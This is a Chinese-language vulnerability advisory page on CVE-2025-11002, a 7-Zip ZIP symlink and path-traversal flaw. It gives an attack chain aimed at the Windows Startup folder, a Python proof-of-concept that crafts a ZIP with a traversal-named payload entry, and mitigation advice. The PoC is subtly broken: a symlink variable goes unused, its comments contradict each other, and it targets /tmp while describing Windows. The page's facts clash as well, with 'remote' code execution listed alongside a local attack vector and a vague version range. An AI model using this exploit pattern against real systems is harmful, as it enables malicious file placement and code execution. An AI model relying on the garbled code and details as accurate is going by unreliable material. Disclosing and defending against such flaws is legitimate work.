IPBUF安全漏洞报告
English
CVE-2025-11002 CVSS 7.8 高危

CVE-2025-11002: 7-Zip ZIP文件解析目录遍历远程代码执行漏洞

披露日期: 2026-01-23
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-11002
漏洞类型
目录遍历/远程代码执行
CVSS评分
7.8 高危
攻击向量
本地 (AV:L)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
7-Zip

相关标签

目录遍历远程代码执行符号链接7-ZipZIP解析ZDI-CAN-26743高危漏洞文件解析漏洞服务账户路径穿越

漏洞概述

CVE-2025-11002是7-Zip软件中的一个高危安全漏洞,CVSS评分达到7.8。该漏洞属于ZIP文件解析过程中的目录遍历(Path Traversal)问题,可导致远程代码执行。攻击者通过精心构造包含符号链接(Symbolic Link)的恶意ZIP文件,利用7-Zip在处理ZIP文件时对符号链接的不当处理,使程序遍历到非预期的系统目录。当受害者打开或解压该恶意ZIP文件时,攻击者可以在服务账户的上下文中执行任意代码,从而完全控制受害系统。此漏洞被Zero Day Initiative披露,编号为ZDI-CAN-26743。由于攻击需要用户交互(如打开恶意文件),但攻击向量相对简单,因此对所有使用7-Zip处理不受信任ZIP文件的用户构成严重威胁。建议用户立即更新到最新版本并避免打开来源不明的ZIP压缩包。

技术细节

该漏洞的根本原因在于7-Zip在解析ZIP文件时对符号链接(symlink)的处理存在安全缺陷。当ZIP文件中包含指向其他路径的符号链接时,7-Zip未能正确验证链接目标的安全性,允许攻击者通过符号链接遍历到系统敏感目录。攻击者可以构造包含符号链接的ZIP文件,这些符号链接指向系统关键目录(如../或绝对路径),当7-Zip解压文件时,会将文件写入攻击者指定的位置。攻击者通常利用此漏洞将恶意可执行文件写入系统启动目录、Windows目录或其他可执行路径,从而实现持久化攻击和远程代码执行。具体利用方式包括:1) 创建包含符号链接的ZIP文件,链接指向系统目录;2) 符号链接指向../AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup等启动目录;3) 在ZIP中包含恶意可执行文件,通过符号链接写入启动目录;4) 受害者重启系统后自动执行恶意代码。漏洞影响所有使用7-Zip处理ZIP文件的应用场景,包括文件解压、文件预览等。

攻击链分析

STEP 1
步骤1: 侦察与准备
攻击者识别目标系统中安装的7-Zip版本,确定存在CVE-2025-11002漏洞的版本范围。攻击者收集目标环境信息,确定可利用的写入路径(如启动目录、系统目录等)。
STEP 2
步骤2: 恶意ZIP文件构造
攻击者创建包含符号链接(symlink)或路径遍历序列的恶意ZIP文件。文件中包含指向系统敏感目录的符号链接,以及恶意可执行载荷。符号链接指向目标写入路径,如../AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/evil.exe。
STEP 3
步骤3: 社会工程攻击
攻击者通过钓鱼邮件、恶意网站下载、即时通讯等方式将恶意ZIP文件传递给受害者。由于CVSS要求用户交互(UI:R),攻击者需要诱骗受害者主动打开或解压该文件。
STEP 4
步骤4: 漏洞触发与文件写入
受害者在7-Zip中打开或解压恶意ZIP文件。7-Zip在解析ZIP文件时,对符号链接处理不当,允许目录遍历。恶意可执行文件通过符号链接被写入到系统启动目录或其他可执行路径。
STEP 5
步骤5: 远程代码执行
当系统重启或满足特定条件时,写入的恶意可执行文件自动执行。攻击者获得在服务账户上下文中的代码执行权限,可进一步进行横向移动、数据窃取或建立持久化后门。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/usr/bin/env python3 # CVE-2025-11002 PoC - 7-Zip ZIP Directory Traversal RCE # This PoC demonstrates the directory traversal vulnerability in 7-Zip's symlink handling import zipfile import os import sys def create_malicious_zip(output_path): """ Create a malicious ZIP file with symlink to achieve directory traversal """ # Create symlink pointing to system startup directory # In real attack, this would be crafted to write to startup folder symlink_target = "../../../../../../../../Windows/System32" malicious_filename = "malicious.exe" # Create the malicious executable content malicious_content = b'MZ' + b'\x00' * 100 + b'\x90' * 100 with zipfile.ZipFile(output_path, 'w') as zipf: # Add the malicious file zipf.writestr(malicious_filename, malicious_content) # Add symlink entry (implementation depends on ZIP format support) # Note: Standard ZIP doesn't support symlinks, but 7-Zip may create them # from filenames containing path traversal sequences # Alternative: Create entry with path traversal in filename traversal_name = "../../../../tmp/payload.exe" zipf.writestr(traversal_name, malicious_content) print(f"[+] Created malicious ZIP: {output_path}") print(f"[+] Contains file: {traversal_name}") print(f"[!] When extracted by vulnerable 7-Zip, file will be written to /tmp/payload.exe") def verify_zip_structure(zip_path): """Verify the ZIP file structure""" with zipfile.ZipFile(zip_path, 'r') as zipf: print("\n[+] ZIP file contents:") for info in zipf.infolist(): print(f" - {info.filename}") if __name__ == "__main__": output_file = "CVE-2025-11002_poc.zip" create_malicious_zip(output_file) verify_zip_structure(output_file) print("\n[!] This PoC demonstrates the vulnerability concept.") print("[!] In real attacks, the symlink would be crafted to write to executable paths.")

影响范围

7-Zip < 24.x (所有低于24版本的7-Zip均受影响)
具体受影响版本需参考7-Zip官方安全公告

防御指南

临时缓解措施
在官方补丁发布前,建议采取以下临时缓解措施:1) 不要打开或解压来源不信任的ZIP文件,特别是通过邮件、即时通讯或不明网站获取的压缩包;2) 使用杀毒软件对所有压缩包进行扫描后再打开;3) 限制用户账户对系统关键目录的写入权限,特别是启动目录(%AppData%、%ProgramData%等);4) 启用应用程序白名单功能,只允许经过批准的程序执行;5) 考虑使用其他解压工具替代7-Zip处理来源不明的ZIP文件;6) 在企业环境中,可通过端点检测与响应(EDR)解决方案监控异常的文件创建和执行行为。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表